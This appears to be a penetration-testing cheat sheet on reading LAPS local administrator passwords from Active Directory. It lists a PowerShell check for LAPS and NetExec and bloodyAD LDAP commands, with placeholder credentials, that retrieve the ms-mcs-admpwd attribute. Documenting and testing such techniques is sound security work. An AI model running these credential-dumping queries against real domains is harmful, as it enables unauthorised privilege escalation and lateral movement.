LAPS
On a computer, if LAPS is in use, you can find AdmPwd.dll
powershell
dir "c:\Program Files\laps\cse\AdmPwd.dll"This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).
Netexec
bash
nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module lapsbash
nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module laps -O computer="us-d*"BloodyAD
bash
bloodyAD --host DC_IP -d DOMAIN -u USER -p PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime